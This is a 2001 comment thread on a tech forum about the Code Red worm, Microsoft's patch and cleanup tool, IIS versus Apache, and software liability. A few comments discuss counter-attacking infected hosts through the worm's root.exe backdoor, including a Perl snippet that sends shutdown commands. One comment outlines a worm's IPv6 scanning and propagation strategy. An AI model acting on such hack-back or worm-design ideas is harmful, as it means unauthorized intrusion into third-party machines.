Also a pilot isn't going to be maintaining the aircraft. Certainly they can't use the controls in the cockpit to change the engines or such like...
I highly doubt software makers will ever be held liable...
Particularly in the x86 market, there is such an abundance of 3rd party hardware that goes into most systems. This usually means 3rd party drivers. And because these all have to work together, who's to say that it wasn't a bug in Windows that caused that video driver to fail? Or was it a bug in the driver itself? Who is to be held liable here?
I don't think it is such a stretch to say that some software makers could (and maybe should) be held liable for their software. Such as in the case of the over-radiation that caused deaths. Last I checked, I didn't see the IIS bug causing anyone to croak and that last BSOD didn't give me any serious medical problems either. If traditional PC software makers were held liable for their software, the PC software market would simply collapse. And beyond that, the few companies left that could afford the added costs of this liability would be left to charge outrageously high prices for the software that they were able to sell.
So, at first, this maybe sounds like not such a bad idea. But after thinking about it, I'd definitely be against it (for the most part).
Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server.
You get this automatically with IIS, indeed you have explicitally turn it off.
You could configure apache to use index server
But it dosn't do it by itself!
It also goes without saying that any product marketed primarily to morons must be foolproof and robust to the most extreme extent possible. Does IIS qualify here?
:)
Does any part of Windows qualify?
All the difficult bits should have warning messages at install time, similar to the warnings on cigarette packages, or the warnings on drug packages against dangerous interactions, knowing full well that products may be used by a moron.
Or even like the "cartoon" style warnings you find on domestic appliances. Together with "refer all servicing to qualified personnell". Problem is the latter is likely to be easier with something more like unix (or even VMS) than any version of Windows
From Eric Raymond's jargon file: !X id1
id1: Friar Tuck... I am under attack! Pray save me!
id1: Off (aborted)
id2: Fear not, friend Robin! I shall rout the Sheriff of Nottingham's men!
id1: Thank you, my good fellow!
-- Another senseless waste of fine bytes.
Yes,
Those machines have probably been patched since infection, but have not been cleaned. The patch does not dis-infect Code Red from the machine, a lot of web admins don't realise this.
I have found Vulnerable machines with this tool. I'm also wondering if unpatched infected machines show up with it - as Code Red prevents re-infections by it's own code.
You are quite right, and I didn't mean to imply otherwise. This is in fact a problem with the group that supplies the PCs to the various departments. They have a process where they "ghost" pre-configured drive images. For some reason, they use a standard development image, which includes a running IIS5 config, on _all_ machines, even those used by the secretarial staff. Go figure.
But you are right, this isn't as much MS's fault as the bonehead admin that set up the default machine configs.
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
This is like selling a shotgun that only fires when pointed at another weapon that is pointed at it, and cannot be modified to do anything else.
However, many people will (as you have done) only see that ``it is a shotgun'' (and panic), not that it is totally harmelss except as used against armed attackers! This is important because some drooling idiots will now conclude, ``it's OK to sell shotguns because SlashDot has done it already''.
Got time? Spend some of it coding or testing
Im coordinating Programmers Against Canada. Anyone want to join ? Everyone who joins gets official P.A.C-MAN membership card =))
yush
Now that's an interesting quandry. LLC's were setup to protect shareholders from liability claims against the company. So I as a developer for software at Acme Corp cannot be legally held liable, myself, for the software I created while working for the company.
But Acme Corp can. Hell if it's bad enough, they'll get sued to high heaven and go bankrupt. Then I can just go find another job.
But what corporation protects Linux? If there's a fault in the Linux kernel which causes something bad to happen... Who do I sue?
Are Linus Torvalds and Alan Cox protected by a LLC? Or do I just sue them personally?
Now you enter into the world of politics. How do you write a law which damages your adversaries, while protecting your friends?
Then the question comes in. What exact purpose does this serve to our society? Will software get better, or will there just be less of it? Especially in light of the fact that you mentioned indirect uses of software, such as AT&T.
It's very easy for people like Bruce Schneier to talk about this because they don't actually write and sell software.
I'll be impressed when you get Larry Ellison or Scott McNealy up there saying it's a good idea. I'll be really impressed when you get Bill Gates.
Microsoft fixed the problem before there was a problem.
I disagree. Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.
I like to play children's songs in minor keys.
"We're all sons of bitches now." --J. Robert Oppenheimer
My domain is on a shared Linux host at CI Host. For over one week now, starting August 2, my domain has been totally useless to me. I couldn't log in to update my content. I couldn't recieve email on the domain POP3 box. I couldn't log in with a POP3 client to download any mail that did sneak through. All this went on for over a week. I would call up on the phone and stay on hold forever... a couple of times I would get clueless technicians that would just say "It's the Code Red virus... our administrators are aware of the problem and will have it fixed as soon as possible". OK I gave them some time to get it fixed because half the internet was having problems with this. But then I noticed everyone else was getting better, and CI Host was still down (except their own www.cihost.com site, which was still aggressively selling service to new customers). I would open up online trouble tickets with them, only to have them get closed without resolution. I re-opened and escalated a couple of times and finally early this morning they took my server down to perform some kind of unknown maintenance and when it came back up it was running better than it EVER had before in the 2+ years I've been with them.
If anyone is thinking of using CI Host, let me tell you THEY SUCK. About twice a year something major like this happens where I'm down for a week or more. In December of 1999 I went down for almost a whole month (their press releases will tell you it was a much shorter time than this but that is BULLSHIT).
I'm looking at maybe switching to PrimeMaster Online (http://www.primemaster.com). Anyone here have experience with them?
Screw Micro$oft.
in /etc/apache/httpd.conf:
.ida
AddHandler cgi-script
How come despite there being (at the time) three times as many Apache servers up as IIS, there wasn't a shadow of the traffic that CodeRed caused?
Don't tell only half a story, and leave out the exciting bits that make it all flow. ``They get found'' seems to have take, oh... six years, is it now? Why? (1)
Not only that, breaking Apache (to pick a common example) doesn't automagically get you superuser capabilities. Why not? (2)
It's been four years now since Apache had a hole this bad, but IIS had them somewhere between monthly and quarterly. Why? (3)
<upside-down><font size="1">1. Only Microsoft can see the source, and their programmers generally don't understand security. 2. IIS is design-insecure partly because takes as many shortcuts as it can to avoid being molasses-slow. Did you know that the Mindcraft benchmarks used FAT instead of NTFS for the same reason? 3. Performance and user friendlyness and saleable features are all more important to Microsoft than security or stability.</font></upside-down>
Got time? Spend some of it coding or testing
You and I know that you don't need your proof of purchase, but is it inconcievable that the bulk of people using a bootleg copy would feel uncomfortable going to Microsoft.com - Thinking that MS will somehow *know* and track them down?
-- My Weblog.
The author intended for it to shutdown iis first, then the remote machine, but he is actually issuing the iis shutdown command twice. Examine: my $resp = $ua->request ($iis_stop_req); if ($resp->is_success) { my $server_stop_req = [...] $resp = $ua->request ($iis_stop_req); That second request should be $server_stop_req instead of $iis_stop_req Now to fiddle with httpd.conf..... WOW SLASHCODE SUCKS, I couldn't submit this at first because it was considered a junk character post. That filter really sucks, I've triggered that so many times trying to do an actual post.
<high-level position here>
<name of stupid small company here>
Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.
And I guess that Linux is better in that perspective? How many times you see linux people doing the EXACT SAME THING by saying it's more secure and stable than Windows? Wouldn't that bring the exact same reaction? "I'll install a linux/apache server because it's more secure" but what if that person has the 0-patching thing in mind already? It's not FORGED by microsoft alone, that's my point... both platforms do the exact same thing on that issue.
I don't want to start a Linux Vs Windows war because it's totally useless, and I surely don't want to be seen on the M$ side
In the end, any OS needs patching, and people needs to be educated about it. Linux or WIndows or MAC I don't care, seeing my RD light on my modem still flashing like hell after that much time after that virus (and titles like aftermath) got announced, THAT worries me a lot.
--- Metamoderating abusive downgraders since my 300th post.
And at that point, you program the worm to be self modifying. Target some 'known' servers. Infect them with targeted worms. On some condition (probably date) each worm (lets say N is the total number of preinfected systems) will start scanning a group of addresses. If V represents the total number of IPV6 addresses. Each host will have a group of exclusive addresses, E, E being V/N number of addresses. Whenever a host finds a new victim, it will give that victim a range of addresses in E to go through, after which the 'subhosts' will attack random. The host will then start scanning the next address past the block it just doled out.
Vintage computer games and RPG books available. Email me if you're interested.
You're wrong. Its the virus writers fault.
-- "Perceptions create reality. By changing your perceptions you change your reality."
http://slashdot.org/comments.pl?sid=01/08/05/16202 20&cid=65
--
There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles. Some good examples where this would apply include some major items in software bugs history: the AT&T 800 service outage, the hospital radiation treatment software controllers that killed people from overexposing them to radiation, and of course Code Red. CNN interviewed Bruce Scheneir (sp?) about this isue and he is all for holding software makers liable. Last week I tried submitting those stories to slashdot, yet the editors dont think it's an issue and won't post it, despite the fact that if liability someday hits the software market, it hits OSS people too.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
Michael writes, So, Microsoft has given you a mop to clean up the mess they made.
No, Microsoft gave us a mop to clean up after the mess the Code Red author(s) made.
You see, more than a month before Code Red came out, Microsoft gave us the patch for the security breach that allowed Code Red to take place.
"And like that
AddType application/x-httpd-php
In case you prefer php
Lotus Domino can use Perl. Off-topic, I know, but this is to help out folks.
.ida files pointing to the perl interpreter. (copy what you see for .pl files)
/default.ida to /cgi-bin/default.ida
1. Make sure your server is not using IIS (since life is easier that way.
2. Install Perl from perl.com. You don't need the ISAPI stuff. Make sure perl is in the path.
3. add a file association on the OS level for
4. create a URL -> URL mapping of
5. place the default.ida script in your Lotus\Domino\Data\domino\cgi-bin directory.
6. restart the domino server.
7. Test it with http://myserver/default.ida?one_arg
Not all of us use Apapche, so save the flames. Some of us have to stick with what the company we work for requires us to use.
As has been so often pointed out, many of Microsoft's fixes also often break things, and they have a nasty habit of occasionally including "improvements" that eventually dead-end you and don't become obvious for some time - like well after it's too late to back out the patch. These features combine to make many admins that I know highly reluctant to install Microsoft's fixes.
/usr/bin, /usr/local/apache/bin, /opt/apache/bin or any one of a number of places; your web pages might be in /home/httpd/html, /var/www/html, /usr/local/apache/html or anywhere the admin chose to put them. It might be running chrooted, it might or might not have zero or more of a great number of modules enabled, and so on;
Apache is more of a monoculture (about twice as much) than IIS, yet Apache worms this bad generally don't happen because:
* Apache is not design-insecure, as is practically every Microsoft product - for example, Exchange's security goolies are still flapping in the breeze (have to be due to fundamental design) and I expect to see another CodeRed appear targeted for it Real Soon Now;
* If you want active facilities, you have to install them - or at least switch them on - because they either don't come with the base server (e.g. PHP) or aren't available in default pages to exploit (e.g. XSSI);
* The active facilities can only touch as much as the webserver can touch. Users named ``apache'' or ``nobody'' generally don't have write access to a great deal of the file system;
* Even though Apache as such is a monoculture, there is great variety between Apaches. They run on a wide variety of CPUs and OSes. Your binaries might be in
* Apache adheres to standards; a lot of IIS holes have been in Microsoft special features;
* Apache's code (including most common add-ons) has been examined by a wide variety of eyes using a wide variety of techniques.
Using Microsoft software costs you all of these advantages and more.
Got time? Spend some of it coding or testing
People here suggest that admins are to blame of the Code Red ongoing catastrophe because they took the responsibility to maintain a server.
Some posts accuse of letting MCSE handle servers, which only mighty hackers with years of experience should touch.
I think it's stupid. there aren't enough admins that fit to the definition of experienced hackers. that's why organizations buy server software to handle 'serving'. they hire admins to operate the server not to code-and-compile or patch every morning. It's true that admins are the ones responsible to patch software, but you can't expect all servers to be patched the moment a patch is released, hell, MS servers failed to patch on time.
The software is not secured. whose negligence is it?
Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server. You could configure apache to use index server, I'm sure, and then code red would *gasp* AFFECT APACHE! By your logic, at least.
Vintage computer games and RPG books available. Email me if you're interested.
Make your own functions. I use:
void StrCpy( char *dest, const char *source, long destSize );
void StrCat( char *dest, const char *source, long destSize );
etc. E.g.:
char str[STD_LINE_SIZE];
StrCpy( str, blah, STD_LINE_SIZE );
Ask and ye shall receive:
NT SP 5 or 6 (sorry don't remember which), broke the TCP/IP sequencing algorithm, making vulnerable to spoofing.
The fix for security holes in Exchange Web broke the server (twice - took 'em till the third try)
My job is programming Windows boxes, so no, I'm not a paid basher.
Which system did Ramen infect? I'm pretty sure it wasn't a Microsoft platform.
Software has bugs. They get found, they get fixed, move on. The only reason MS exploits get more press and greater impact than Linux exploits is that MS is on more boxes. If, as you claim to desire, Linux takes off, the same people shrieking to the sky about what a crappy system MS has will be defending Linux and saying, hey, it happens. Stupid users who don't patch aren't Bill Gates' fault.
It's just the same crap from folks who attack NT as buggy and crashprone (which is almost always due to 3rd-party drivers) while extolling the stability of Linux, which they keep rebooting because they have wonky drivers. A ha! they say, I was using a beta driver, its to be expected. Well, that driver has been in beta for over a year, that's as good as it gets. Software has bugs, move on.
You want to ignore your own faults and start a religious war? I'm betting you can get some cheap flights to Tel Aviv right now. Knock yourself out.
-reemul
who wishes 2k wasn't so buggy, either, but doesn't want to hear the bitching from folks who need 2 hours and a phone call to a friend to get a soundcard working
You're just jealous 'cuz the voices talk to *me*
OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?
For extra credit: reboot twice, as Micro$oft recommends.
For a straight A: fix the problem forever by replacing NT with Linux...
Oh gods, someone PLEASE tell me how I could get a job bashing Microsoft. I do it for free all the time.
And here's a security hole for you. Service Pack 6 (that's the original Service Pack 6, not 6a) not allowing anyone but Administrators to access the TCP/IP stack. You think that possibly some of Microsoft's vaunted legions of crack QA people might've possibly tried testing the service pack as something other than an Administrator?
There a nice fake webserver you can run on unix or windows platforms that launches a warning html page on the attacker's machine. Why let the "authorities" run the net, especially when the code red attackers are asking you for default.ida - whatever you make that to be.
Link:
http://www.dynwebdev.com/codered/
Just a correction... Apache does *NOT* run MUCH more of the web than does IIS.
You just have to go look at the Netcraft survey's to understand. In the past they've pointed out that half of SSL enabled sites run IIS. Then about a month or two ago they started trying to identify individual machines and found IIS/Windows combination again on half of the overall web.
What we do know is that Apache is used in many more cohosting situations. Jimmy and Susy set up a web page and pay $0-10/month for it. Is it a signifigant thing that companies providing low price service with no service level agreements use a free OS/web server? I don't think so, but you be the judge.
Two other points:
Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.
You should *ALWAYS* test patches and new releases before installing them into a production environment. That applies not only to Microsoft, but also to Linux, Sun, HP, Oracle, Peoplesoft, everything!
In our testing service packs don't usually break apps. But they do have a tendency to break drivers or low-level hardware monitoring tools provided by the manufacturer. Is this surprising? No. Again we have the same problems on our Unix servers with OS patches.
It is worse than that, actually.
Here, all of the W2K workstation boxes were infected. These are not sysadmins or developers who should know better, these are just all the people who work here and are provided with a workstation to do their jobs and have no idea that IIS is running on their machines.
They have no idea and weren't ever told that they need to apply any patches. Couple days after the CR panic started to spread, we got an alert from our crack security administration group that we should download and install a patch from Microsoft if we were running any NT servers.
Of course, none of them new what the hell this meant, so they assumed it didn't apply to them and so did nothing.
Sheesh, what a mess!
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
> I mean at some point not everyone in the
> world can be a computer expert,
A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747's be made so easy to fly that every office worker could do it ?
> so are you recommending that people that
> aren't shouldn't have a computer?
If they are not willing/able to bring themselves up to the necessary level of competence to run general-purpose computers, yes. Give me a manually operated medium-format or 35 mm SLR camera, and I'm just as helpless as a Mac or Windows user at a unix commandline. If it ain't point-and-click, I'm totally lost. That doesn't mean I'm stupid; just that I'm not competent to use a particular tool.
> There wouldn't be a computer industry if it
> weren't for the "stupid" people needing
> computers to help out thier jobs and lives.
> What we need to do is constructively help make
> the experience good and safe for everyone.
That's where WEB-TV are aiming at. They are to the general-purpose computer what the point-n-click camera is to professional equipment. The great majority of people aren't geeks. That's not disparagement; merely admitting that Joe Average is no more competent to operate a general purpose computer than I am to manually operate a medium-format camera. It's not an admission of stupidity, just an acknowledgement that different people have different competencies.
I'm not repeating myself
I'm an X window user; I'm an ex-Windows user
On top of that, the admins who missed repeated pleas from both Microsoft and Government officials urging them to install the patch, not to mention all the publicity the pleas and the virus made on CNN (both the website and on TV), other major national news networks, and even my local (Washington DC area) television news stations.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
Actually, it might even be good PR for them too.
this is what joe user will think:
A dangerous "virus" threatens the entire internet (*cough*) and then microsoft comes to the rescue with a patch and saves the internet!
I hope it's Microsoft-certified to work, at least.
And disabling your web server as an option to keep your web server free from infection is so ingenious that I completely lack the words to describe the ingenuity behind it.
There is absolutely no reason to panic.
08/10/01 I received a total of 132 probes to tcp:80 on my 12.82.x.x dynamic IP via my dialup to worldnet.att.net
These are exclusively from other dialups and small-scale hosts in AT&T's 12.x.x.x class A; AT&T has introduced ingress filtering and I'm seeing almost nothing from outside (Note: almost - some stuff is still leaking through..)
But the problem is the enemy within: there's got to be thousands of home/SOHO small systems, maybe single boxes, put together by the hotshot early-adopters and techno-yuppies who think it's cool to go through the checkout stand at CompUSA and purchase a copy of Win 2K Professional, or whatever, and put it on their home systems with all the bells and whistles installed.
None of these boxes are under *any* formal administrative control, and it's going to be up to each and every one of these thousands of techno-yuppies to patch each and every single one of their boxes.
So far today 08/11/01 at 10:00am I've had 69 probes.
As far as I can see, getting all these systems disinfected and patched hasn't even started yet.
t_t_b
I'm on PJ's "enemies" list! Are you?
Anybody ever read Zodiac, by the always-popular Neil Stephenson? Short plot: the bad guys are dumping PCB's in Boston Harbor. They invent a genetically engineered bacteria to eat all the PCB's. They also invent one to make PCB's along the way, which accidentally gets loose and threatens to destroy the planet.
I wonder how long it's going to be before some good-hearted, but slightly insane, person writes a Virus to close security holes in Windows? Then what happens when it trashes every version other than Windows 95 OEMSR3.1 (or whatever -- I don't run windows.) Would Microsoft do such a thing to cover up their mistakes? Would we ever know if they did?
Incidentally, In my more evil moments, I had thought that a virus to change everyone's default web browser to Netscape would be kind of poetic justic. Let me say, up front, that I would not write one and am not advocating that anyone else does so. But it would be an interesting use of the sircam code.
-- Slashdot sucks.
well, not really, the IPv6 address space will be largley unused. but the areas that are used will be well known, it would be very easy to specify the good ranges to scan.
-- free as in swatantryam - not soujanyam.
Microsoft marketing says:
"You're a trained monkey. You too can run a web server! Just blow $1,000 on our systems and you're all set."
THe person who believed Microsoft when they said that is partially to blame, surely, but in the beginning it's Microsoft that has to take the hit for overpromising and underdelivering. If you promise a secure product anyone can use, well, you're on the hook if you don't supply one.
D
Microsoft's whole philosophy and marketing is that "it's easy to do" and tha "anybody can do it".
Applying patches isn't always easy- sometimes you've got to do it often.
System security isn't easy- ever.
Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.
I blame them not because they're big- I blame them because they fostered this BS in the first place!
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Actually, it was the mess the hackers created.
the permanent-disable function presumably would override future installs.
some M$ things install other M$ things automatically. I'm hoping that the permanent disable function would detect other programs trying to install IIS and stop them.
I'm probably too optimistic...
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins.